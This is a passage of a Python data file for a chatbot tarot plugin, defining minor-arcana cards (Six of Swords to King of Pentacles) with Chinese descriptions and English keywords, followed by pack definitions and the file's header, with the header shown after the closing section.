intro='一艘小船上插着六把宝剑,船上有一个女人、一个小孩与一位船夫。\n\n船缓缓的朝远方的岸边前进,而此端的水汹涌,彼方的水平静。象征伤害的六把剑插在船身上,以及三个主角哀伤的背影,构成宝剑六缓慢低回的基调。沉重的剑身让船夫只能缓行,疗伤的过程亦同。但是我们不能把宝剑抽起,否则船会沉,正如我们不能把过去的哀伤连根拔起,只能轻轻的抚平。也许你该庆幸,这些宝剑并不能使船沉没。', words='平静', 
desc='宝剑六暗示远离是非,在混乱之后,逐渐回复平静。\n\n这是受伤后康复的过程,不管伤多重,总是能痊愈。水象征情绪,这端汹涌的水是你烦扰的过去,前方大片平静的水面,预示未来安详的情绪。船夫手持黑色长篙,黑色象征潜质,将来什么都还是可能发生,不要将自己困死了。宝剑六是一个信道,领你向未来的幸福快乐前进,光明的日子就在前方。\n\n这张牌暗示你正带着你的剑(问题),从过去走向未来。或许你根本没注意到它们,然而它们却是与你紧紧相随。这是一个从艰困时刻过渡到一个较为平衡状态的过程。即使现时的问题及困难如何复杂,最终都会得到解决,求问者届时心情自然轻松不少。宝剑六可能是在说明当你转移向新的经验时,你也正慢慢的远离困境,情绪从过去释放出来。', upright='Transition, Leaving behind, Moving on, Departure, Distance, Accepting lessons', reversed='Emotional baggage, Unresolved issues, Resisting transition, Stuck in past, Returning to trouble, Running away from problems, Trapped' ), init=False) seven_of_swords: TarotCard = field(default=TarotCard( id=56, index='seven_of_swords', type='minor_arcana', orig_name='Seven of Swords', name='宝剑七', intro='图中的男子身处军营中,趁着远方敌人炊饭没有防备时,悄悄偷走五把剑,还留着两把在原处。', words='逃避', desc='宝剑七意味另辟蹊径,若要成功的话,需要一种新的方法。\n\n宝剑七所传达的讯息是:不要放弃。去找寻另一种可以达成目标的方法吧。坐下来,检查一下你所有的选择,以便发现先前未曾预见的可能性。你当然还有时间来完成你的愿望,然而在方法上需要更有弹性,各种行动的不同组合方式,就有可能会带来不同的结果。\n\n宝剑七暗示经由审慎评估各种可能,你就能找到有效的解决之道。透过详细的规划和不放弃的决心,你就能得到更多。比如你目前正汲汲营营于某件重要的事,理智所提供的解决方案会让你不需要如此费劲。\n\n宝剑七同时也是一张秘密、隐藏动机和不坦诚的牌。牌中暗示求问者欲逃避一段令他不愉快的事情,这件事可能会令他有金钱损失或与面子有关,求问者若肯勇敢面对,并应用智慧及交际手段去补救。', upright='Deception, Trickery, Tactics and strategy, Lies, Scheming, Strategy, Resourcefulness, Sneakiness, Cunning', reversed='Coming clean, Rethinking approach, Deception, Confession, Conscience, Regret, Maliciousness, Truth revealed' ), init=False) eight_of_swords: TarotCard = field(default=TarotCard( id=57, index='eight_of_swords', type='minor_arcana', orig_name='Eight of Swords', name='宝剑八', intro='一个女人眼睛被布蒙住,上半身被捆绑着,身处八把宝剑群中。地上满是象征羞辱的泥泞,而远方是座矗立于峭壁之上的城堡,象征绑住她的权威。', words='限制', 
desc='宝剑八暗示限制及丧失个人的能力。\n\n宝剑八代表的是你被限制住的一段时间,或是在某种情况下你失去个人的能力。你觉得动弹不得,受到限制,而且没有办法看清楚你前面的路。\n\n塔罗牌的“八”是代表力量的牌。而对于宝剑八里面的女人,这份力量源自于倾听她内在的声音的能力。双眼被蒙蔽让她无法透过视觉来做判断,她显得那么的无能为力,然而第一眼看上去这是个阻碍,但其实却是助力。阻碍那个女人控制自己所处环境的力量,却使得她能够走进自己的内心世界倾听内在的声音,并且留心它所发出的指令。如果你想做出有效率的决定,现在是留心你的自我精神层次的时候了。\n\n去探索那等待着你的道路吧,利用你内在的力量和个人的能力,将自己从目前的情况中释放出来,并且把那些曾经屈服于他人的个人能量重新召唤回来。你的信念其实才是你最大的限制。好好自省并检视这些信念,因为事实上目前的“眼罩”是在帮助你,因为它可以让你不会分心。', upright='Imprisonment, Entrapment, Self-victimization, Trapped, Restricted, Victimised, Paralysed, Helpless, Powerless', reversed='Self acceptance, New perspective, Freedom, Release, Taking control, Survivor, Facing fears, Empowered, Surrender' ), init=False) nine_of_swords: TarotCard = field(default=TarotCard( id=58, index='nine_of_swords', type='minor_arcana', orig_name='Nine of Swords', name='宝剑九', intro='午夜梦回,一个女子从睡梦中惊醒,把脸埋在双手中。墙上横挂着九把剑,看起来彷佛从后面刺穿那女子,带给人极大的压迫感。棉被图案是由象征热情的玫瑰,以及星座符号组成的。床侧则雕刻着一人击败另一人的画面。', words='梦魇', desc='宝剑九暗示由梦境传达的直觉,或对问题的担心。\n\n宝剑九代表的是强烈的梦。或许你的潜意识正努力教导你某些事情,去倾听你的梦境。宝剑九是一张代表担心和情绪骚动的牌。这种担心可能是对自己或周遭的一切。也可以代表鲜明的梦境或梦魇,而梦魇则可能是在传达一种强烈的讯息,即你生命当中某些不对劲的事物,已由潜意识而浮现在你的意识层面了。\n\n假设你将你的梦境写成日志,或许会发现一个共同的线索或是明显的讯息。那么你的梦就可以变成一项接近你潜意识的有效工具了。', upright='Anxiety, Hopelessness, Trauma, Fear, Negativity, Breaking point, Despair, Nightmares, Isolation', reversed='Hope, Reaching out, Despair, Recovery, Learning to cope, Facing life, Finding help, Shame, Guilt, Mental health issues' ), init=False) ten_of_swords: TarotCard = field(default=TarotCard( id=59, index='ten_of_swords', type='minor_arcana', orig_name='Ten of Swords', name='宝剑十', intro='一个俯卧的男人,背上插着十把剑,有一把甚至从插进耳朵里去。这画面实在令人怵目惊心。牌面中有一半被黑色的天空和乌云所占去,多少暗示宝剑十这张牌是大家避之唯恐不及的所谓的“坏牌”。', words='失败', desc='宝剑十意味着痛苦挥之不去,在另一个开始之前某种状况的结束。\n\n这张牌暗示在某种情况下,你已到了最低潮的时刻,你也可能是被一些无用的事物,或对生命具破坏性的信念给绊住了。但远方微弱的阳光暗示着,尾随这艰困时刻的将会是新的以及更好的事物。你对人生的思想或信念导致你此刻的境遇,从这里,你的思想将会带领你到任何你认为能够去的地方。\n\n宝剑十代表一种情况的结束。可能指两性关系的结束,或某关系中的一个阶段的结束,或一项事业的失败。你生命中的某些事物已经结束了,虽然这毫无疑问的会是一段艰难的时期,不过好消息是,它终究会过去,接受这个事实有助于新事物来取代旧的的。', upright='Failure, Collapse, Defeat, Ruin, 
Bitterness, Exhaustion, Dead end, Victimization, Betrayal', reversed="Can't get worse, Only upwards, Inevitable end, Survival, Improvement, Healing, Lessons learned, Despair, Relapse" ), init=False) page_of_swords: TarotCard = field(default=TarotCard( id=60, index='page_of_swords', type='minor_arcana', orig_name='Page of Swords', name='宝剑侍从', intro='宝剑侍从两手握著宝剑,眼光却朝著远方。他的头发和背景中的树都被风吹得飞扬。远方天空中有十只小鸟成群飞舞。背景灰云带来些许混乱的气氛', words='幻想', desc='宝剑侍从象征太多的梦想,而行动却不够。\n\n你可以发现到这个侍从双脚离地甚远,这个思考敏捷的年轻人喜欢说话、有很多点子和创新的概念,而这些成双出现的点子却无法搭在一起。这表示一种生活的态度,这种态度要求你透过梦境和思想让自己从现实抽离出来。\n\n宝剑侍从可能代表有关你目前所拥有的一个构想或计划的消息。但却没有付诸行动。对那些依赖创意和思考维生的人而言,这可说是一张正面的牌,但是也可能暗示脚踏实地是必要的,假设你想生产实际或有形的东西。', upright='Curiosity, Restlessness, Mental energy, Curious, Witty, Chatty, Communicative, Inspired, Vigilant, Alert, Mental agility', reversed='Deception, Manipulation, All talk, Scatterbrained, Cynical, Sarcastic, Gossipy, Insulting, Rude, Lack of planning' ), init=False) knight_of_swords: TarotCard = field(default=TarotCard( id=61, index='knight_of_swords', type='minor_arcana', orig_name='Knight of Swords', name='宝剑骑士', intro='宝剑骑士和圣杯骑士同样骑着白马,但宝剑骑士这匹马在狂风中极速奔驰,与圣杯骑士平缓前进的马形成强烈对比。宝剑骑士将宝剑高举过头,表情狰狞,向前冲杀。马鞍上饰以蝴蝶和鸟,象征风要素。他穿着铁甲,外袍也有鸟的图案,而靴子前后都带着尖刺,在战场上毫不留情。云和树都被狂风吹得七零八落。空中飞翔的鸟,队形也略显散乱。', words='急躁', desc='宝剑骑士暗示要达成愿望需要有敏捷的行动。\n\n宝剑骑士代表的是迅速的行动:跃进或跳出某种情景。作为某个问题的答案,它暗示着一个快速的动作或出其不意的行为是有需要的。已经没有时间去想该做何选择了——去做就对了。\n\n这张牌通常是代表一个年轻人,他不按牌理出牌、缺少耐心、思考敏捷。这是属于年轻人的力量,他要走往自己的道路。是一种英勇的行径或者说英雄气概的展现。当然这种冲撞的行动,也可能极具破坏力,能造成摧毁的状况。他的意志力坚强,专注而犀利,有着清明的勇气和专一凝聚的心志。', upright='Action, Impulsiveness, Defending beliefs, Assertive, Direct, Impatient, Intellectual, Daring, Focused, Perfectionist, Ambitious', reversed='No direction, Disregard for consequences, Unpredictability, Rude, Tactless, Forceful, Bully, Aggressive, Vicious, Ruthless, Arrogant' ), init=False) queen_of_swords: TarotCard = field(default=TarotCard( id=62, index='queen_of_swords', type='minor_arcana', orig_name='Queen of Swords', name='宝剑皇后', 
intro='宝剑皇后戴著蝴蝶花纹的王冠,象征灵魂,也象征风要素。她穿着灰色内袍,和蓝天灰云花纹的披风。她的表情坚毅,似乎皱著眉头,左手却对世界敞开。她右手高举宝剑,剑尖笔直向上。她的宝座扶手之下有个人头花纹,那是风之精灵,宝座的底部又有蝴蝶花纹。宝剑皇后的头顶上有只高飞的鸟。背景天空是深蓝色的,还有大片的灰云。', words='理智', desc='宝剑皇后代表淡定冷静,经过深思熟虑所得到的成就。\n\n宝剑皇后是一张思索感情的牌。它可能意味运用心智到情感中的行动,好让感觉有意义。作为某个问题的答案,宝剑皇后暗示透过清晰思考而获致成功。\n\n现在正是你反省过去的行为或目前情况的时刻了。密切的观察那些接近你的事物,以确认你不会再重陷困境中。你可能会想从生活当中撤退,好好的思考你自己,以及未来的方向。', upright='Complexity, Perceptiveness, Clear mindedness, Honest, Independent, Principled, Fair, Constructive criticism, Objective, Perceptive', reversed='Cold hearted, Cruel, Bitterness, Pessimistic, Malicious, Manipulative, Harsh, Bitter, Spiteful, Deceitful, Unforgiving' ), init=False) king_of_swords: TarotCard = field(default=TarotCard( id=63, index='king_of_swords', type='minor_arcana', orig_name='King of Swords', name='宝剑国王', intro='宝剑国王是四张国王牌中唯一以正面出现的。他穿著蓝色内袍和红色披风,他的右手持剑,剑尖偏右,偏向行动的那一边。左手戴着象征权力的戒指,轻松的放在腿上。他后方帷幕上饰有象征灵魂和风要素的蝴蝶花纹。天空中的鸟的数量有两只,象征在智慧与行动之间的选择,对宝剑国王而言,智慧必须用行动来实现。', words='公正', desc='宝剑国王暗示将梦想化为现实,用构想去做一些真实的事。\n\n宝剑国王是客观理性,凡事讲求合理和公正,具有坚定而一贯的信念和完整的思想体系,很难被他人所影响。他凭借事实和原则而下决定,不会情感用事或主观成见,并且会考虑得十分周到,显出谨慎和深沉的特色。\n\n宝剑象征着人的思想和决心,这位国王手执宝剑,自然具有着掌握思考的能力,并且很重视理念和原则,在意的是合理与正义。宝剑国王代表对清楚的思想的追求、诚实,以及将只是倒入现实的需求。作为某个问题的答案,这张国王牌可以说是透过清楚而有效之计划而达到成功。', upright='Head over heart, Discipline, Truth, Reason, Authority, Integrity, Morality, Serious, High standards, Strict', reversed='Manipulative, Cruel, Weakness, Irrational, Dictator, Oppressive, Inhumane, Controlling, Cold, Ruthless, Dishonest' ), init=False) ace_of_pentacles: TarotCard = field(default=TarotCard( id=64, index='ace_of_pentacles', type='minor_arcana', orig_name='Ace of Pentacles', name='星币首牌', intro='云中伸出一只手,捧着一枚星币。背景是花草满布的繁盛庭园,绿树拱门外的远方有座白色的山,暗示星币一不只有关物质,也可以延伸到精神层面。', words='物质', desc='星币首牌暗示,你有足够的钱好执行你的计划。\n\n星币首牌是张将梦想化为实质的牌。圣杯牌组中,我们有梦﹔星币牌组中,我们筑梦,梦想不再只是空中楼阁。星币首牌让我们稳健,踏实,有安全感。星币首牌和务实的开始有关。它意味你有足够的金钱、精力,或充分的条件,来开始一项新计划。它暗示你可以平衡掉花费。不论目前花掉了多少钱,赚回来的绝对够本。', upright='Opportunity, Prosperity, New venture, New opportunities, Resources, Abundance, Security, Stability, 
Manifestation', reversed='Lost opportunity, Missed chance, Bad investment, Missed chances, Scarcity, Deficiency, Instability, Stinginess, Bad investments' ), init=False) two_of_pentacles: TarotCard = field(default=TarotCard( id=65, index='two_of_pentacles', type='minor_arcana', orig_name='Two of Pentacles', name='星币二', intro='一个红衣装扮,头戴高帽,类似街头艺人的男子,正在耍弄两个星币,星币外围的带子形成8自形无限符号,魔术师和力量牌中也有这个符号。他背后的海面起伏剧烈,两艘船正在其上行驶。', words='两难', desc='星币二暗示与金钱有关的决定。\n\n星币二显示一个专注于钱财的人。此时他并没有重大的财务压力,只是要决定那张账单要先付而已。保持弹性,是星币二带给我们的另一个课题。除了随机应变的弹性,星币二也求取平衡。\n\n星币二描述着权衡各种机会的轻重,而这次它们是属于身体或物质的层面上。这象征着介于两个选择之间的决定。你有没有办法现在就抉择,或是再等一会儿会不会比较好呢?', upright='Balancing decisions, Priorities, Adapting to change, Balancing resources, Adaptation, Resourcefulness, Flexibility, Stretching resources', reversed='Loss of balance, Disorganized, Overwhelmed, Imbalance, Unorganized, Messiness, Chaos, Overextending' ), init=False) three_of_pentacles: TarotCard = field(default=TarotCard( id=66, index='three_of_pentacles', type='minor_arcana', orig_name='Three of Pentacles', name='星币三', intro='在一座修道院里头,有位雕刻师正在工作,旁边两位修道人拿着草图,似乎正在和雕刻师讨论工作的进度。', words='学习', desc='星币三暗示透过研究、学习,或者将构想付诸实现,而改善自身的境遇。\n\n这张牌代表扎根于稳固的基础上,建立某些具有持久价值的东西。也许你是在建造一栋房子,开始学习一个对你有助益的课程,或为稳固的两性关系或生意打基础。星币三对自我发展而言是张正面的牌。星币三表示去作某些将可以改善你环境事情的一段时间。它可能是开始一个课程、阅读书籍,或如果它是出现在事业的分析中,那就是你在工作当中学习拥有一个机会去建立某种具有永久价值的东西。\n\n星币三是一个鼓励,鼓励当事人不管在进行什么样的工作,都可以仔细计划,然后放手去做,因为他具备完成工作所需要的专业能力,他有充足的才干来达成手边任何任务。星币三的成功不是偶然,他不仅有专业能力,还实实在在的工作。', upright='Teamwork, Collaboration, Building, Shared goals, Apprenticeship, Effort, Pooling energy', reversed='Lack of teamwork, Disorganized, Group conflict, Lack of cohesion, Apathy, Poor motivation, Conflict, Ego, Competition' ), init=False) four_of_pentacles: TarotCard = field(default=TarotCard( id=67, index='four_of_pentacles', type='minor_arcana', orig_name='Four of Pentacles', name='星币四', intro='图中的男人戴着皇冠,身穿象征统治威权的红色袍子,下摆饰以蓝边,显示出崇高的领主身分。他坐在一个箱子上,头顶一枚星币,双手紧抓着另一枚,双脚又各踩着两枚,紧张的神情似乎深怕他失去任何一丁点财产。这个人虽有钱,却孤绝于城市人群之外。', words='节约', 
desc='星币四意味厚积薄发,节省你的金钱或体能以迎接更大的挑战。\n\n星币四正位置常代表物质上的获利与稳定,获利的来源可能是工作,也可能是接受赠与或遗产。然而,星币四代表物质上的稳定,却不保证心灵上的成长。星币四意味你正在节约金钱、节省精力,或是节制。它也可能意味经由节约金钱、偿还债务及量入为出,而是你的财务状况日趋稳定。或许你在设计增加收入或减少指出,以确保自己进来的钱比出去的多。', upright='Conservation, Frugality, Security, Possessiveness, Insecurity, Hoarding, Stinginess, Stability, Savings, Materialism, Wealth, Boundaries, Guardedness', reversed='Greediness, Stinginess, Possessiveness, Generosity, Giving, Spending, Openness, Financial insecurity, Reckless spending' ), init=False) five_of_pentacles: TarotCard = field(default=TarotCard( id=68, index='five_of_pentacles', type='minor_arcana', orig_name='Five of Pentacles', name='星币五', intro='冰天雪地中,两个乞丐蹒跚前行,又瘸又驼背,身上的衣服破烂不堪。他们经过一间象征物质与精神庇护的教堂,却视而不见,挺着饥饿且疲惫的身躯,径自赶路。', words='困难', desc='星币五意味对那些充实你的事物的疏离感。\n\n卡面上的两个人本可以选择如何去发现、跟随及落实精神之路。教堂其实只是他们的一种选择。它代表把精神价值介绍给那些无意去追求的人。在五这张牌中,这些人没有看见它,因此丧失了一个改变的机会。外在悲惨是内在悲惨的一种反映,所以当星币五出现时,你需要接受生命提供给你的改变机会。“如果你想改变这个世界,请先改变你自己”是这张牌的答案。\n\n就整体观点来看,星币五说的是财务上的困难、贫穷、疾病和内在的寂寞。在不断的挣扎当中,你很容易窄化你对问题的焦点,而忽略了你的机会。当这张五出现时,深度的心灵改变是有其需要的,否则虽然有外在的助力,可能还是解决不了你的问题。你目前的人生观并非你的支柱,而现在你必须问自己,是否仍愿意保有这些信念。', upright='Need, Poverty, Insecurity, Hardship, Loss, Isolation, Feeling abandoned, Adversity, Struggle, Unemployment, Alienation, Disgrace', reversed='Recovery, Charity, Improvement, Positive changes, Recovery from loss, Overcoming adversity, Forgiveness, Feeling welcomed' ), init=False) six_of_pentacles: TarotCard = field(default=TarotCard( id=69, index='six_of_pentacles', type='minor_arcana', orig_name='Six of Pentacles', name='星币六', intro='一个商人装扮的男子,脚边跪着两个乞丐。商人右手施舍其中一名乞丐,左手拿着象征平衡的天秤。', words='施舍', desc='星币六暗示没有绝对的公平,其中一人比另一人更有控制力。\n\n星币六是在形容一种结构性的关系,其中一人比另一人更有控制力。是一张有很多层面的牌,而它的意义又会随着问题或周遭的牌而改变,在这张牌中,看似公平和正当,不过,请注意,两个乞丐是跪在富翁的面前。在这个关系里,他是处于有权力的地位。星币六是在形容一种关系:一个人支配另外一个人。\n\n跪在地上的人事实上是受制于他的,暗示着局面是由他所控制,而他是透过他的财富来掌控这一切。这个站着的人深谙拥有金钱就是拥有权力。他就越能选择自己的人生。施与受中间不只是金钱,知识、经验、技术的传授也算。所以星币六也代表知识、经验、技术的传授或是学习。', upright='Charity, Generosity, Sharing, Community, Material help, Support, Giving and 
receiving, Gratitude', reversed='Strings attached, Stinginess, Power and domination, Power dynamics, Abuse of generosity, Strings attached gifts, Inequality, Extortion' ), init=False) seven_of_pentacles: TarotCard = field(default=TarotCard( id=70, index='seven_of_pentacles', type='minor_arcana', orig_name='Seven of Pentacles', name='星币七', intro='一位农夫把下巴架在杖上,低头看着他长久辛勤得来的收成。这丛农作物在他的耕耘下,已经可以自己成长茁壮了。农夫的表情似乎很满足,又彷佛在思考下一步该怎么做。', words='规划', desc='星币七意味着思考未来的财务或物质状况。\n\n星币七暗示目前工作即将完结,只剩下一点尾巴要收而已。经历过去长时间段孜孜不倦的努力,现在可以暂停一下,看看自己目前的成就,想想下一步的行止。星币七是一种实际面上的投资与等待,并且具有时间性,能解释出过去和未来的现象。代表过去曾经付出努力,投注了资源和精神,如今正在等待成果,未来也将有机运得到这些回收。处于一种回顾和期待的状态。\n\n星币七代表思考和计划未来的一段时间。你的生活或目前的状况尚称平稳,所以你有时间可以安静的计划未来的步骤。这可能包括进一步的学习、强调休闲、谨慎地经营现有财物,甚至再创另一种事业,以补充现有的事业。花些时间多做思考吧,因为你的决定有可能对将来产生很大的影响。', upright='Hard work, Perseverance, Diligence, Harvest, Rewards, Results, Growth, Progress, Patience, Planning', reversed='Work without results, Distractions, Lack of rewards, Unfinished work, Procrastination, Low effort, Waste, Lack of growth, Setbacks, Impatience, Lack of reward' ), init=False) eight_of_pentacles: TarotCard = field(default=TarotCard( id=71, index='eight_of_pentacles', type='minor_arcana', orig_name='Eight of Pentacles', name='星币八', intro='一位雕刻匠坐在长板凳上,专注而勤劳地刻着星币星币,他前面已经完成六个了,脚边还有一个未完成。有一条黄色的道路连接远方的市镇与雕刻匠,连接工作与社会,无论什么工作,目的都是服务人群,雕刻匠并未忘记这一点。', words='上进', desc='星币八暗示对某人或某种状况的承诺。\n\n星币八是代表工作赚钱的一张牌,也表示能够累积财富,集中心力在赚取金钱上。这是一张代表承诺并专注于眼前工作的牌,而意念当中这乃是为了较长的目标而努力。\n\n星币八暗示对一个人或一种状况的深度承诺。现在你则着重于你的技巧以及如何变得更精炼。可以透过不懈的努力,或进一步的学习让技艺更上层楼。这张牌时说你已经在群体当中找到了自己的位置,并且在做适合你做的事情。你明白工作不应该是沉闷无味的,而是一种自我完成的机会。工作不仅只是为了填满你时间、胃或口袋,更重要的是让你的人生完整。', upright='Apprenticeship, Passion, High standards, Skill, Talent, Craftsmanship, Quality, Expertise, Mastery, Commitment, Dedication, Accomplishment', reversed='Lack of passion, Uninspired, No motivation, Lack of quality, Rushed job, Bad reputation, Lack of motivation, Mediocrity, Laziness, Low skill, Dead-end job' ), init=False) nine_of_pentacles: TarotCard = field(default=TarotCard( 
id=72, index='nine_of_pentacles', type='minor_arcana', orig_name='Nine of Pentacles', name='星币九', intro='一位衣着华丽的女子站在她的庄园中,四周葡萄茂盛,正是收成时节。她右手扶在星币上,大拇指还扣着一根葡萄藤,左手则戴着白手套,让她的小鸟站在上面,小鸟的头部却被红布遮住了。', words='自律', desc='星币九代表收获与安逸,丰富的物质生活与相对应的束缚。\n\n星币九是一张代表自信或自我依赖的牌,那可说是要达到超凡成就的必要条件。你的自信如果在搭配上自律的话,那将使你在许多层面上获益。\n\n大体上来说,星币九形容由于过去的努力而带来的一种舒适的生活。星币九代表财富的成功与富足,显示对于生活实际投入的层面,并表达了物质与精神层面的相互关系。', upright='Fruits of labor, Rewards, Luxury, Rewarded efforts, Success, Achievement, Independence, Leisure, Material security, Self-sufficiency', reversed='Reckless spending, Living beyond means, False success, Being guarded, Material instability, Superficiality' ), init=False) ten_of_pentacles: TarotCard = field(default=TarotCard( id=73, index='ten_of_pentacles', type='minor_arcana', orig_name='Ten of Pentacles', name='星币十', intro='星币十的近景是一位老年人,他舒服的坐着,身旁围绕着两只狗。拱门外的市镇中有一对青年男女,似乎在讨论什么,还有一个小孩子。十个星币排列成生命之树的符号。', words='富裕', desc='星币十意味归于平静的物质上的成功。\n\n星币十意味物质上的成功,星币十画的是一个安稳而舒适的居家环境。从墙上盾形家徽看得出这是一个富裕而巩固的环境,这个家庭拥有能提供舒适物质环境的一切条件。那么,为什么每个人都没有面对着别人呢?这老人是坐着的,他的注意力放在动物们的身上,年轻人背对我们,而女人也没有面对他,却稍稍侧着脸继续和他谈话。小孩子被忽略了,这些人彼此之间也没有真正的关联。它们得到别人所渴望的物质世界,不过很显然这也使他们感到沉闷,并陷入公式化的生活中,一旦这种公式消失,将无所适从。\n\n星币十是整组牌可能性的充分显示。他缺乏权杖的热情、宝剑的理想以及圣杯牌的情感。在这里可以找到物质上的安全感和稳定,但也付出了代价。', upright='Legacy, Culmination, Inheritance, Roots, Family, Ancestry, Windfall, Foundations, Privilege, Affluence, Stability, Tradition', reversed='Fleeting success, Lack of stability, Lack of resources, Family disputes, Bankruptcy, Debt, Conflict over money, Instability, Breaking traditions' ), init=False) page_of_pentacles: TarotCard = field(default=TarotCard( id=74, index='page_of_pentacles', type='minor_arcana', orig_name='Page of Pentacles', name='星币侍从', intro='星币待从双脚坚稳的站立在地面上,高高捧着星币,他所着迷的东西,在眼前仔细地观察着。他头戴红色软帽头饰,带子围着肩颈。身上的穿着是以棕色为底,套着绿色的外衣,鞋子和腰带也是棕色的。他站在青葱且长满花朵的草地上,远方有茂密的树丛,画面的右下还有一座山。', words='勤奋', 
desc='星币侍从意味着为理想而努力学习。\n\n星币侍从象征有关金钱、新工作或学习一门课程的消息。它可以表示去学习某些将会产生实质效益的事物。这个侍从通常代表学生的勤奋向学。透过学习一门课程,或于工作中学习,发挥了自己的能力。有时候这个侍从可能暗示你对于正在学习的科目,变得更专注,甚至更重视学习的成果。', upright='Ambition, Desire, Diligence, Ambitious, Diligent, Goal oriented, Planner, Consistent, Star student, Studious, Grounded, Loyal, Faithful, Dependable', reversed='Lack of commitment, Greediness, Laziness, Foolish, Immature, Irresponsible, Lazy, Underachiever, Procrastinator, Missed chances, Poor prospects' ), init=False) knight_of_pentacles: TarotCard = field(default=TarotCard( id=75, index='knight_of_pentacles', type='minor_arcana', orig_name='Knight of Pentacles', name='星币骑士', intro='星币骑士笔直地坐在黑马背上,仔细打量手上的星币。黑色的强壮马匹配着厚实的红色马鞍和缰绳,侧面垂着红色的软坐垫,牢牢地站在地面,是四张骑士牌中唯一不动的座骑。骑士戴着头盔,头盔顶端饰有穗状的绿叶,黑马的头顶也有相同的叶穗。他身着厚重盔甲,外披一件暗红色战袍,也戴着红色的手套。星币骑士处于空旷的大地上,眼前应是一望无际。远方的地面是一片经过细心耕耘的田地,背景是一片鲜黄色。', words='稳健', desc='星币骑士代表稳健而认真的计划。\n\n星币骑士通常指的是强化你的计划,并朝确定的目标迈进。它意味着为了实现一个目标而努力工作。就一个人而言,这个人对于承诺非常的认真,不论是对事业、个人雄心或两性关系。通常,他相信这个格言:“如果你想做好一件事,那就自己动手吧。”', upright='Efficiency, Hard work, Responsibility, Practical, Reliable, Efficient, Stoic, Slow and steady, Hard-working, Committed, Patient, Conservative', reversed='Laziness, Obsessiveness, Work without reward, Workaholic, Dull, Boring, No initiative, Cheap, Irresponsible, Gambler, Risky investments' ), init=False) queen_of_pentacles: TarotCard = field(default=TarotCard( id=76, index='queen_of_pentacles', type='minor_arcana', orig_name='Queen of Pentacles', name='星币皇后', intro='星币皇后的面貌端庄而正直,双手捧着星币,并低头凝望着星币,神情若有所思。她的后冠是圆顶的,中间有插着两根红色羽毛,星币皇后的后袍是红色的,内衫露出的袖子是白色的,是红白对立的组合,绿色的披风由头上往下延伸到椅上。皇后的宝座处在长满丰盛植物的平原上,在茂密的林荫中,玫瑰花围绕成的拱门之下,所在的草地之上盛开着多株玫瑰花,。座椅是精工雕琢的,刻满了纹饰。有许多植物和天使的图案,很像圣杯皇后的座椅,扶前端有羊头的浮雕,椅侧有小孩的浮雕,椅背刻满了藤蔓瓜叶。宝座旁的近景是一片肥沃的土地,满是绿草和花朵。', words='安定', desc='星币皇后意味着喜爱大自然,又有良好的商业眼光。\n\n从一般观点来看,星币皇后是一张代表信任自己能力的牌。她意味经由深思熟虑而带来成功。作为一个人,星币皇后通常有着敏锐的生意眼光,而且总是喜欢存点钱在身边,好让自己有安全感。在有需要的时候她会很节俭,而且不会任意炫耀财富。她是一个可靠、实际的人,知道应该在那里下功夫可以得到最大的成功。\n\n这张皇后牌是指务实、可靠,并擅长喂养植物和动物。她也喜欢经常到乡间旅行,或漫步于大自然中,因为她需要和自然保持接触,让生命有完整而踏实的感觉。', 
upright='Practicality, Creature comforts, Financial security, Generous, Caring, Nurturing, Homebody, Good business sense, Practical, Comforting, Welcoming, Sensible, Luxurious', reversed='Self-centeredness, Jealousy, Smothering, Selfish, Unkempt, Jealous, Insecure, Greedy, Materialistic, Gold digger, Intolerant, Self-absorbed, Envious' ), init=False) king_of_pentacles: TarotCard = field(default=TarotCard( id=77, index='king_of_pentacles', type='minor_arcana', orig_name='King of Pentacles', name='星币国王', intro='星币国王悠然自得的坐在他的花园里。他的左手拿着星币,右手拿着权杖,姿态轻松。花围中长满象征丰收成果的葡萄和各种植物,他的服装也满是葡萄图案,整个人似乎与大自然融成一体。宝座上有牛头图案,是星币的家族图腾。国王的右手靠在座椅的扶手上,掌中握着宝球权柄。左手持拥五芒星金币,并垫起左脚让这枚大金币更稳定确实地置于膝上。国王慵懒地靠在椅背上,低眼安然地端详着他的金币。', words='坚定', desc='星币国王表示务实而坚定的态度可以带来成功。\n\n星币国王暗示透过身体力行而达到成功。它也可以说是务实的努力带来物质上的成功。星币国王代表的是一个脚踏实地而又成熟的人。他的个性稳健、可靠且保守,并能努力履行其承诺,谨慎的负起他应负的责任。他不像权杖国王般富冒险精神,或像圣杯国王那么有创意,但他可凭藉着慢慢而稳定的步伐,以及认真的实践来达到成功。', upright='Abundance, Prosperity, Security, Ambitious, Safe, Kind, Patriarchal, Protective, Businessman, Provider, Sensual, Reliable', reversed='Greed, Indulgence, Sensuality, Materialistic, Wasteful, Chauvanist, Poor financial decisions, Gambler, Exploitative, Possessive' ), init=False) class TarotPacks(object): """ 定义套牌 """ SpecialCard: TarotPack = TarotPack( name='special', cards=[card for card in TarotCards.get_all_cards() if card.type == 'special']) MajorArcana: TarotPack = TarotPack( name='major_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'major_arcana']) MinorArcana: TarotPack = TarotPack( name='minor_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'minor_arcana']) RiderWaite: TarotPack = TarotPack( name='rider_waite', cards=[card for card in TarotCards.get_all_cards() if ( card.type == 'major_arcana' or card.type == 'minor_arcana')]) __all__ = [ 'TarotCards', 'TarotPacks' ]
""" @Author : Ailitonia @Date : 2021/08/31 21:24 @FileName : tarot_data.py @Project : nonebot2_miya @Description : 塔罗卡牌及卡组数据 虽然这里看起来使用 json 会更好 但还是用 dataclass 硬编码了:( @GitHub : https://github.com/Ailitonia @Software : PyCharm """ from typing import List from dataclasses import dataclass, field, fields from .tarot_typing import Element, Constellation, TarotCard, TarotPack @dataclass class Elements: earth: Element = field(default=Element(id=0, orig_name='Earth', name='土元素'), init=False) water: Element = field(default=Element(id=0, orig_name='Water', name='水元素'), init=False) air: Element = field(default=Element(id=0, orig_name='Air', name='风元素'), init=False) fire: Element = field(default=Element(id=0, orig_name='Fire', name='火元素'), init=False) aether: Element = field(default=Element(id=0, orig_name='Aether', name='以太'), init=False) @dataclass class Constellations: pluto: Constellation = field(default=Element(id=-9, orig_name='Pluto', name='冥王星'), init=False) neptunus: Constellation = field(default=Element(id=-8, orig_name='Neptunus', name='海王星'), init=False) uranus: Constellation = field(default=Element(id=-7, orig_name='Uranus', name='天王星'), init=False) saturn: Constellation = field(default=Element(id=-6, orig_name='Saturn', name='土星'), init=False) jupiter: Constellation = field(default=Element(id=-5, orig_name='Jupiter', name='木星'), init=False) mars: Constellation = field(default=Element(id=-4, orig_name='Mars', name='火星'), init=False) earth: Constellation = field(default=Element(id=-3, orig_name='Earth', 